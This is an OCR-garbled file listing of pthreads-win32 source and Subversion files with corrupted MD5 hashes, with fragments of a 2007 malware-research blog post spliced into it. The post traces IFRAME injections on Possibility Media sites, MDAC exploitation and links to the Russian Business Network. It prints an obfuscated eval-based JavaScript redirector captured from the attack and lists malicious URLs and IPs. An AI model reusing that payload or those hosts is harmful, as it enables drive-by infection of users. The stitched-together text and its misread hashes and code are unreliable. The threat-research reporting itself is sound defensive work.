pthread attr _getschedparam.c 
4f5fdfdbf333c6012e8f36823393e690 
pthread attr _getschedpolicy.c 
fecb499c80d985bd5aadb8cc7e33bb91 
pthread attr _getscope.c 
69a7c47942a9e4b3d7d982a5fa8cf9I60 
pthread attr _getstackaddr.c 
b26f339cc1f4b7d00174c4443c1223d7 
pthread attr _getstacksize.c 
d5288657f20f8ed763b8f4e9afe43f2e 
pthread attr _init.c 
683a5952e5821df2d6a7ce661691ad20 
pthread attr _setdetachstate.c 
ddca6b89174eec5513af486559a31cb2 
pthread attr _setinheritsched.c 
aed7307ebaee866b38f8e2fe9dca4fa9 
pthread attr _setschedparam.c 
22020c1fdd0ed05b269d751ca8f4ele0 
pthread attr setschedpolicy.c 
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ba1891657e9a567446694b7d025123ba 
pthread attr setscope.c 
5fa4c254568e731f68b0bc804f87fa3d 
pthread attr setstackaddr.c 
0248c3bb0e55786d74ee6e428023650a 
pthread attr setstacksize.c 
25b81793cca5ec56ccdfbf6004e4ce2d 
pthread _barrierattr destroy.c 
cdaa8194ef98c88298e9277210793ea4 
pthread _barrierattr getpshared.c 
2f263156b646ea06ae1b569f00c6a344 
pthread _barrierattr _init.c 
31432811af847573ccc8fecb493f350c 
pthread _barrierattr setpshared.c 
71c0fd0c4905af258c6d72b3a7a7d4f9 
pthread barrier _destroy.c 
2d6749b68bba4ddd14al11fec6992f40e 
pthread _barrier _init.c 
700c479c972829bd6ea179c73ea5c8C9 
pthread barrier _wait.c 
b23c55539d7728e5004e8a24caed970c 
pthread _cancel.c 

886ec808148ff5 13ff19d853836964d4 
pthread condattr _destroy.c 
cfe75ef2c8eddf86ec66af3299a86458 
pthread condattr_getpshared.c 
d03841c90360c8cad64d37d29ffcc2fe 
pthread condattr _init.c 
cfe50232c1cf889825700d356cc0870c 
pthread condattr setpshared.c 
d99ec12d6779ff6bd951351ec21e9621 
pthread cond _destroy.c 
8d991laa0a08b09fd992f023e14c3e551 
pthread cond _init.c 
19697294947a0a79ad838ff8d6f2a4e2 
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pthread cond _signal.c 
a926b0c51410ae6dc34fc7ca65a09d99 
pthread cond _wait.c 
6799a3f349588f383533b8e4ele6e6f8 
pthread delay _np.c 
7cee60522a639b962d514eCc067504127 
pthread _detach.c 
c70e762ea975c95e099c6b00a15d744e 
pthread _equal.c 
0dd48879e326a289df907cal6db15fde 
pthread _exit.c 
ae0a03587f9635efdbb460fd7eae5l1lea 
pthread _getconcurrency.c 
5d48952efe0428532d0f848625c7achbe 
pthread _getschedparam.c 
fb89a4d06071fc673e64fbd920b30b74 
pthread _getspecific.c 
66a89f4ce67f35e5e66e7ab6ad81ef683 
pthread getw32threadhandle _np.c 
d342ea56f7c739a9e96c802376a5512e 
pthread join.c 
8acb6b50a9ff021c671f9d31086d5a51 
pthread key create.c 
54e948d2dccf88469c42adcb8ab6e6262 
pthread key delete.c 
e€661148ddc3a5d1060ea6ed17016c358 
pthread _kill.c 
5afa88a135efe3d129307cab947797d3 
pthread mutexattr destroy.c 
801e0539a7aa21fel2eae0440f6c112f 
pthread mutexattr_getkind _np.c 
8fe3f1b326fce135857b89812a65f0ca 
pthread mutexattr getpshared.c 
Oeb5d639acd44f3f27e708bd63c4d960 
pthread mutexattr gettype.c 
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3.10.31 Possibility Media’s Malware Fiasco (2007-10-30 14:22) 


t 


cirectadmin 


After both [1]TrendMicro and [2]Sophos acknowledged the [3]Jattack on Possibility Media’s 
portfolio of online publications, added detection, further clustered the attack, as well as came 
up with a fancy graph to visualize the IFRAME-ing attack, the attackers changed the IFRAME 
code and directed it to another location, and perhaps it’s more interesting to see them express 
their feelings about getting exposed in such a coordinated manner. The second IFRAME URL 
from the previous post now greets with "ai siktir vee?" message. What does "ai siktir vee" 
means? It means "get lost". The new IFRAME URLs as of yesterday are exploiting MDAC 
ActiveX code execution (CVE-2006-0003), and here are more details : 


(58.65.239.28) ilovemyloves.com/films/in.cgi?11 
ilovemyloves.com/traff.php 
ilovemyloves.com/fuck.php 
ilovemyloves.com/lol.php 
ilovemyloves.com/nuc/index.php 
ilovemyloves.com/games/index.php 
ilovemyloves.com/ra/load.php 


Is there by any chance the possibility that the [4]Russian Business Network’s IPs might 
be somehow involved? Don’t be naive - of course there are RBN IPs involved and talking about 
them, deobfuscating scripts or analyzing the binaries related to RBN is becoming a rather 
boring task given nothing’s changing. Remember all those parked domains on the second 
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0d36b0b667e733bc189419eaf24058d7 
pthread _mutexattr _init.c 
0ba2b45d35880a964fa6f2493eb360ff 
pthread mutexattr setkind _np.c 
bf90b30106c4b302ce9a5fb2fb3e4d68 
pthread mutexattr setpshared.c 
660c267e5fb3f635ed2b65cdd8ed3f04 
pthread mutexattr _settype.c 
3bc9aafc4f4a558b0ab5b8b432103197 
pthread mutex _destroy.c 
8223329a896655f6d712074942c9e3eb 
pthread mutex _init.c 
ad448b005f9ceb45d480e3c30ff4071F 
pthread mutex _lock.c 
3f2472d8404e683eed467fad157ead37 
pthread mutex _timedlock.c 
4207d8ca7648fd827d0f3359325c3bdb 
pthread mutex __trylock.c 
5df4888fe32e44eae80ebf514042ccf9 
pthread mutex _unlock.c 
€8b425b17c9d75207e7b22480ae7f129 
pthread num __processors _np.c 
daf0c08c4048a2117a71le8lec5fcbccl 
pthread _once.c 
700a39€696322589fac2598627c71e60 
pthread rwlockattr destroy.c 
d1b34b57f886c13f0c662f6e7f085045 
pthread _rwlockattr _getpshared.c 
bff28c4c6f089cdc3516393316465707 
pthread _rwlockattr _init.c 
f73d91e80c6e204f65173deeld56ebee 
pthread _rwlockattr setpshared.c 
fd231f3c35d8c998cab61ab49714ef24 
pthread _rwlock _destroy.c 
43d661flcefelda4290f4518917fc851 
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pthread _rwlock _init.c 
820flbb7bd12aa24a823f2fbfcd13d0a 
pthread _rwlock _rdlock.c 
2324cf9542740dd7eefcal0f0b69552a 
pthread rwlock _timedrdlock.c 
673b434b4953cb594ea4deab6e512990d 
pthread rwlock _timedwrlock.c 
0541d083166be307e58ca21fca47416c 
pthread _rwlock _tryrdlock.c 
4baa4a2626965b7adf412e5984a34a58 
pthread _rwlock _trywrlock.c 
838b51c2f629c01ed8951f5 7bb68ff23 
pthread rwlock _unlock.c 
0e3709646dd2611d29979e37c414fc6l 
pthread rwlock _wrlock.c 
f5fb818049a82ba150323fea4fcae096 
pthread self.c 
27428a844444dc65b3839ad50eb49da5 
pthread _setcancelstate.c 
83cfd164085256ca9bd55d176b561b4a 
pthread _setcanceltype.c 
c1b8f99c725652cfa324f33b0107f52a 
pthread setconcurrency.c 
063d0748d3c76e8efd5cd2d905b9f894 
pthread setschedparam.c 
e6dbd63f60f3663c59db44508f6755ca 
pthread _setspecific.c 
922ff50b089afc2995b73692de176866 
pthread spin _destroy.c 
d9bd2d5159ee30d97c47f6455c6b66b2 
pthread spin _init.c 
b5daa9bf63094a8d4c0821df8c262db5 
pthread spin _lock.c 
32820ded10fc73c8946b67f96e4dd659 
pthread spin _trylock.c 
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75d5e2c4a32a61e52b8870481fec9e10 
pthread spin _unlock.c 
464e81862391dfd3f023cd208d1138e7 
pthread _testcancel.c 
79597a0d52eddebdea37b23c62c5130a 
pthread _timechange handler _np.c 
41a050a032b61dc38a2950374ba7413b 
pthread win32 attach detach _np.c 
e7dfc38f3730337de6bb6eb17254e621 
ptw32 calloc.c 
8d46d098473072b1a2bf1899000265e8 
ptw32 _callUserDestroyRoutines.c 
b3624eb0ba9cf49ff4f5253ebfcbbee6 
ptw32 cond check _need _init.c 
cad661495450f8f36f03e902394cd74b 
ptw32 decrease semaphore.c 
956148b6e8b6da0d0f28aa81leda21a86 
ptw32 _getprocessors.c 
08d377c212d3b4185cb71846e72f6497 
ptw32 increase semaphore.c 
6c41079c1baa308f0578c0b3768953f1 
ptw32 _InterlockedCompareExchange.c 
32bb362fle8e0987e07c9bf4e4baa721 
ptw32 is _attr.c 
29a06dc770445ca530459d82969cf9eb 
ptw32 mutex check _need __init.c 
9e5d9e472ec22775a9b2b0c627411720 
ptw32 _new.c 
181ccfl1lcaf2724717f4d27d45988375 
ptw32 _processlnitialize.c 
ab6a647deaf72f10d7eb71f480a6b007 
ptw32 _processTerminate.c 
3d61065810159c1f10526b6c9b81bf55 
ptw32 _reuse.c 
fcaa8e0fcf7a4c8406955b3alb09ffe3 
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ptw32 _rwlock _cancelwrwait.c 
eaaf7ef0b825c610b8968380el1a08bdc 
ptw32 rwlock check _need _init.c 
fa1l94f24105f6d03f7 76d75df4ce4c2f 
ptw32 spinlock check need _init.c 
e2cf649b117eb37bb36e0ed227afcf00 
ptw32 _threadDestroy.c 
2a232cfc406e839ffd7fe2efc0a22198 
ptw32 __threadStart.c 
7172fe7956491df4b56ea26acb026083 
ptw32 _throw.c 
a967b990c02689c2a0102666c91e0370 
ptw32 _timespec.c 
17d7f054e0f26c3a0c8aee49c958bdaa 
ptw32 _tkAssocCreate.c 
9f6cf981be1042382e2664651003b792 
ptw32 __tkAssocDestroy.c 
9f69b2ae2fd454a3dff967alf68f88dt 
rwlock.c 6c39e3f7f9caf1lc8046f9ee942a88F40 
sched.c 
e5a560618fbd7bdd9d6a2ccfeee5cb14 
sched.h 
9bf8b221a478f29e4ba542ac4c7c77ee 
sched _getscheduler.c 
a5bfa4cfc9db0526ac1308b0f5bf1280 
sched _get priority _max.c 
66dee8363b55d0189924e212e8855cda 
sched get priority _min.c 
983129b53a87d8cf410ab829e4613ae8 
sched _setscheduler.c 
e€4777e94623814eb0b216a41eb5776b4 
sched _yield.c 
a399aba13412a46fa8e83854ecae8357 
semaphore.c 
07fc784f1569d63731270ac84e1065d0 
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semaphore.h 
90f547b8d8b3ea2b7793960e1708eff6 
sem _close.c 
36cfe46bf222eb5ff265e7ed3026b7b8 
sem _destroy.c 
47ad61c6b2b306dfbc43650699a30128 
sem _getvalue.c 
12afd6893ab1dbf8d1fa170473e6c8f4 
sem __init.c 
a24f7f807ba68cb75059fd344b3bc214 
sem _open.c 

85492 7f98fb2be2cd8b7abe2908e39e0 
sem _post.c 
d6dcadad29390df5010a0cbd936d18d9 
sem post _multiple.c 
7117a693be7d93f961d4147422fe6634 
sem _timedwait.c 
2a926dd822c8944a299e1bd7b3302fd3 
sem __trywait.c 
0204ebf15630d456472396c3f6b42b79 
sem _unlink.c 
9128ef69f0f8b8c0920ae4380d3cc939 
sem _wait.c 
816f33725f02310a446ea64ffcfaaba6 
signal.c fe630082ffba5785f007fb8c759al9e2 
spin.c 
6d6b2cfef6922a823438ad555f263279 
SyNC.C 
446c403c1c5ecbb19d6a3db57d98eca9 
tsd.c 
69c39e05b8f45b3be5e233c7600adf18 
w32 _CancelableWait.c 
c7acc65c8be2d6723574b0851a7b69c3 
empty-file 


entries 
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9cd4cf3e96ael16f63a58fa806e6fb3f7 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
attr.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
barrier.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cancel.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
cleanup.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
condvar.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
create.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
dil.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
errno.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
exit.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
fork.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
global.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
implement.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
misc.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
mutex.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
need _errno.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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nonportable.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
private.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getdetachstate.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getinheritsched.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getschedparam.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr getschedpolicy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getscope.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getstackaddr.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getstacksize.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr setdetachstate.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr setinheritsched.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr setschedparam.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr setschedpolicy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


pthread attr _setscope.c.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setstackaddr.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setstacksize.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread barrierattr_getpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _barrierattr setpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread barrier destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread barrier _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread barrier wait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _cancel.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr getpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread condattr setpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread cond _signal.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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pthread cond _wait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread delay _np.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread detach.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread equal.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread _exit.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread _getconcurrency.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _getschedparam.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _getspecific.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


pthread getw32threadhandle _np.c.svn-base 


202977d1c96f487abe4ale202dd03b4e 
pthread join.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread key create.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread key delete.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
pthread _kill.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr destroy.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 


pthread mutexattr_getkind _np.c.svn-base 


2d2977d1c96f487abe4ale202dd03b4e 


pthread mutexattr _getpshared.c.svn-base 


2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _gettype.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


pthread mutexattr _init.c.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _setkind _np.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _setpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr settype.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _lock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _timedlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _trylock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutex _unlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread num __processors _np.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _once.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _getpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr setpshared.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread rwlock _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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IFRAME IP from the previous post? [5]JAccording to this writeup by Symantec’s Kaoru Hayashi, 
some of the hosts - fiderfox.info:8081; gipperlox.info:8081; gipperlox.info:8081 - are acting 
as communication platforms with a trojan downloaded from an RBN IP - 81.95.144.146 in order 
for the trojan to receive spam sending configurations. Now, where do we know 81,.95.144.146 
from? From the [6]Bank of India hack as it was among the several IPs used in the IFRAME 
attack. 


chtml><head><meta HTTP-EQUIU=""REFRESH” content="5; URL=index .php?java"'><script 
Lanquage=JavaScript>str = 

“bh<cng)( :bgtobuhnotcng) (tzhw st{?<tenbtldou/bsd udDndldou) &nckdbuk( 2 b{ /rdu@uushctud) thek-&{ &( bf 
/rdu@uushctud)&bm  rrhek-tbmk«tr hte ;CERH8 7B UtHe47 , 74R2 , OR HHGE1 , SOHKR2G , 118*HB1SHHEGBSRHHSDHHR27 
ke shusxtzhw stpt<t{/Bsd “ udNckdbu) &lre*tylLexem3&et/ RHYL EMMI MHRUE HEU QE Re ( thw strt<t{/Bsd~ udNckdb 
U) BRidmt*tn/Aqh=tqnk=thb  uht<tnok-ke( shu stut<t{/Bsd  udNckdbu)& e&*kneketc/ t*krukesdeKk La-ke( ob 
usx?ztu/uxqd?<t O:bp/nqdo) &F &e HD t*kUR—kiuug ; . -319/63/ 079/067 .d,Lhji mhbi3361.mne/qiqk-g mrd(:bp/r 
doe) (:tu/nqdo)( :bu/Ushud)p/sdrqnordCnex( :bw sto ldt<te/..//..8ulq6065/dyd&=bu/R wdUnGhmd)o1d-3(: 
bu/Bmnrd)(:th| th ‘ubi)d(tze*)( | busxtztr/ridmmdydbtud)o*1d( =f] tb“ ubi)d(tz] | bb “ubi)d(z| Jbbh="sstr2 = 
"stor (i = 8; i < str.length; i ++) ¢ str2 = str2 + String.fromCharCode (str.charCodeAt (i) ~ 
1); }; eval (str2);</script></head></html> 


Getting back to the latest developments behind the dynamic tactical warfare applied by 
the attackers at 208.72.168.176, they seem to have introduced a new obfuscation at : 
208.72.168.176/e-Mikhalich2210/index.php which you can see in the screenshot attached. 
Once we get to feel the binary we can conclude it’s a spam bot known under different names 
such as Dropped:Trojan.Proxy.Pixoliz.l; Trojan-Proxy.Pixoliz and W32/Pixoliz. 


Detection rate : Result: 11/32 (34.38 %) 

File size: 123924 bytes 

MD5: 15027f9e4dc93e95e70f7086f2bf22de 

SHA1: 494a675df55167cf4ed5a2c0320cdaa90dbbc10e 


New domains under different IPs are also connected with the previous and the current 
IFRAMEs as they all tell me to "ai s/ktir", for instance : 


privatechecking.cn/stool/index.php 
musicbox1.cn/iframe.php 
xanjan.info/ad/index.php 


There’s even [7]a Storm Worm connection. For instance, musicbox1.cn/iframe.php re- 
freshes [8]textdesk.com which is heavily polluted with known storm worm domains such 
as : eliteproject.cn/ts/in.cgi/alex; 88.255.90.74/su/in.cgi?3; 81.95.144.150/in.cgi?11; take- 
names.cn/in.php; bl0cker.info/in.php; space-sms. info etc. 


Dots, dots, dots and data speaks for itself. 


http: //blog.trendmicro.com/malicious-iframes-hosted-on-e-zines-a-media-possibility/ 


. http://www. sophos.com/security/blog/2007/10/714.htm 
. http: //ddanchev. blogspot .com/2007/10/portfolio-of-malware-embedded-magazines. htm 


http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 


ttp://www.symantec.com/security_response/writeup. jsp?docid=2007-091508-2904-99&tabid= 


. http: //ddanchev. blogspot .com/2007/08/bank- of - india-serving-malware .htm 
. http: //www.disog.org/2007/09/stormworm-iframe-hell .htm 


ttp://www.google.com/interstitial?url=http://www.textdesk.com/ 
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pthread _rwlock _rdlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _timedrdlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread rwliock _timedwrlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _tryrdlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiock _trywrlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiock _unlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiock _wrlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _self.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setcancelstate.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setcanceltype.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setconcurrency.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread setschedparam.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _setspecific.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _spin _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _lock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread spin _trylock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


pthread spin _unlock.c.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread _testcancel.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread timechange handler _np.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
pthread win32 attach detach _np.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 calloc.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _callUserDestroyRoutines.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 cond _check _need _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 decrease semaphore.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _getprocessors.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 increase semaphore.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _InterlockedCompareExchange.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 is _attr.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 mutex check _need __init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _new.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processlnitialize.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processTerminate.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _reuse.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _rwlock _cancelwrwait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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ptw32_rwlock _check _need __init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _ spinlock check need _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _threadDestroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _threadStart.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _throw.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _timespec.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocCreate.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocDestroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
rwlock.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched _getscheduler.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched _get priority _max.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched _get priority _min.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched _setscheduler.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sched _yield.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
semaphore.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


semaphore.h.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
sem _close.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _destroy.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _getvalue.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _init.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _open.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post _multiple.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _timedwait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _trywait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _unlink.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sem _wait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
signal.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
spin.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
sync.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
tsd.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
w32 _CancelableWait.c.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
attr.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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barrier.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cancel.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
cleanup.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
condvar.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
create.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
dil.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
errno.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
exit.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
fork.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
global.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
implement.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
misc.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
mutex.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
need _errno.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
nonportable.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
private.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread.h.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getdetachstate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getinheritsched.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getschedparam.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getschedpolicy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getscope.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getstackaddr.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _getstacksize.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setdetachstate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setinheritsched.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setschedparam.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setschedpolicy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setscope.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread attr _setstackaddr.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
